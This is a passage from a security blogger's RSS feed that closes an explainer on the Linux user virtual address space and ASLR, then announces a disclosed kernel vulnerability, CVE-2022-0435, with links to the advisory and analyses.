This helps mitigate exploitation techniques that rely on knowing where stuff is in memory!</p><p>Modern compilers are also able to compile code as &quot;position independent&quot; <sup>[2]</sup>, which, tl;dr, means the virtual address of the executable code can be randomised as well! Pretty neat :) </p><p>Of course, I&apos;d be remiss if I didn&apos;t mention there&apos;s a procfs file to check whether ASLR is currently enabled: <code>cat /proc/sys/kernel/randomize_va_space</code> <sup>[3]</sup></p><hr><ol><li><a href="https://en.wikipedia.org/wiki/Address_space_layout_randomization">https://en.wikipedia.org/wiki/Address_space_layout_randomization</a></li><li><a href="https://en.wikipedia.org/wiki/Position-independent_code">https://en.wikipedia.org/wiki/Position-independent_code</a></li><li><a href="https://linux-audit.com/linux-aslr-and-kernelrandomize_va_space-setting/">https://linux-audit.com/linux-aslr-and-kernelrandomize_va_space-setting/</a></li></ol><h3 id="wrapping-up-in-uvas">Wrapping Up In UVAS</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2022/03/we_did_it.gif" class="kg-image" alt="Linternals: The User Virtual Address Space" loading="lazy" width="480" height="260"></figure><p>And there we have it! 
Hopefully this has provided a high-level overview of the user virtual address space. We&apos;ve covered:</p><ul><li>That the virtual address space is split up into two sections, the lower half being the unprivileged user virtual address space (UVAS)</li><li>Userspace is limited in what it can do, but can ask the kernel to perform privileged actions on its behalf via the system call interface</li><li>We looked at what a typical application, <code>cat</code>, uses the UVAS for: loading and mapping the code and data into memory, allocating memory for the heap and stack, as well as mapping in library files such as libc and locale information</li><li>Next we took a brief look at the system calls that userspace applications can use to get the kernel to set up their virtual address space</li></ul><h2 id="next-time">Next Time!</h2><p>Can you believe I planned to wrap everything up in this post? Of course I did, whoops! Suffice to say, we still have a lot to cover in an indeterminate number of posts! </p><p>Coming up, we&apos;ll context switch and take a closer look at what goes on in the kernel virtual address space and how it&apos;s mapped. After that, we&apos;ll get technical as we figure out how all this is implemented via the kernel and hardware features.</p><p>Thanks for reading!</p><p>exit(0);</p>]]></content:encoded></item><item><title><![CDATA[CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel]]></title><description><![CDATA[Recently I discovered a vulnerability in the Linux kernel that's been lurking there since 4.8 (July 2016)! 
CVE-2022-0435 is a remotely and locally exploitable stack overflow in the TIPC networking module of the Linux kernel]]></description><link>https://sam4k.com/cve-2022-0435-a-remote-stack-overflow-in-the-linux-kernel/</link><guid isPermaLink="false">620c2d361b5b6d052837b0c7</guid><category><![CDATA[linux]]></category><category><![CDATA[security]]></category><dc:creator><![CDATA[sam4k]]></dc:creator><pubDate>Tue, 15 Feb 2022 23:00:00 GMT</pubDate><media:content url="https://sam4k.com/content/images/2022/02/what.gif" medium="image"/><content:encoded><![CDATA[<img src="https://sam4k.com/content/images/2022/02/what.gif" alt="CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel"><p>My last post, a <a href="https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-vulnerabilities/">guide on disclosing Linux kernel vulns</a>, might have been a bit of a giveaway, but recently I discovered a vulnerability in the Linux kernel that&apos;s been lurking there since 4.8 (July 2016)!</p><p>Now that the embargo is up, I can share it with the world! <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0435">CVE-2022-0435</a> is a remotely and locally exploitable stack overflow in the TIPC networking module of the Linux kernel (don&apos;t worry, if you haven&apos;t heard of TIPC, it probably isn&apos;t loaded by default on your distro). 
</p><h2 id="find-out-more">Find Out More</h2><p>If you want a <strong>brief technical overview</strong> of the vulnerability, check out the advisory I posted to the oss-security mailing list:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://seclists.org/oss-sec/2022/q1/130"><div class="kg-bookmark-content"><div class="kg-bookmark-title">oss-sec: CVE-2022-0435: Remote Stack Overflow in Linux Kernel TIPC Module since 4.8 (net/tipc)</div><div class="kg-bookmark-description"></div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://seclists.org/shared/images/tiny-eyeicon.png" alt="CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel"></div></div><div class="kg-bookmark-thumbnail"><img src="http://seclists.org/images/oss-sec-img.png" alt="CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel"></div></a></figure><p>For a more <strong>detailed analysis</strong> of the vulnerability, covering the same content as the advisory, check out my blog post over on the Immunity blog:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://web.archive.org/web/20240330111237/https://blog.immunityinc.com/p/a-remote-stack-overflow-in-the-linux-kernel/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel</div><div class="kg-bookmark-description">CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel Appgate Threat Advisory Services (CANVAS) discovered a vulnerability, where local or remote exploitation can lead to denial of service and code execution. 
Read more on the discovery and how to remediate.Summary Appgate Threat Advisory Serv&#x2026;</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://web.archive.org/web/20240330111237im_/https://blog.immunityinc.com/p/a-remote-stack-overflow-in-the-linux-kernel/favicon.ico" alt="CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel"><span class="kg-bookmark-author">Immunity Inc. Blog</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://web.archive.org/_static/images/toolbar/wayback-toolbar-logo-200.png" alt="CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel"></div></a></figure><p>Focusing more on exploitation, I discuss the work and techniques involved in writing a contemporary remote kernel exploit, using CVE-2022-0435 as a case-study:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://web.archive.org/web/20240330065352/https://blog.immunityinc.com/p/writing-a-linux-kernel-remote-in-2022/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Writing a Linux Kernel Remote in 2022</div><div class="kg-bookmark-description">Writing a Linux Kernel Remote in 2022 In this blog, we examine what goes into remotely exploiting the Linux kernel in 2022, highlighting the main hurdles as well as the differences and similarities with local exploitation.Overview At Appgate Threat Advisory Services, we focus on offensive security&#x2026;</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://web.archive.org/web/20240330065352im_/https://blog.immunityinc.com/p/writing-a-linux-kernel-remote-in-2022/favicon.ico" alt="CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel"><span class="kg-bookmark-author">Immunity Inc. 
Blog</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://web.archive.org/web/20240330065352im_/https://blog.immunityinc.com/img/linux_contexts.png" alt="CVE-2022-0435: A Remote Stack Overflow in The Linux Kernel"></div></a></figure><h2 id="get-in-touch">Get in Touch!</h2><p>General reminder that if you have any questions / corrections / suggestions / requests for content, regarding CVE-2022-0435 or any of my Linuxy security-y stuff, feel free to @ me on <a href="https://twitter.com/sam4k1">Twitter</a>!</p><p>exit(0);</p>]]></content:encoded></item></channel></rss>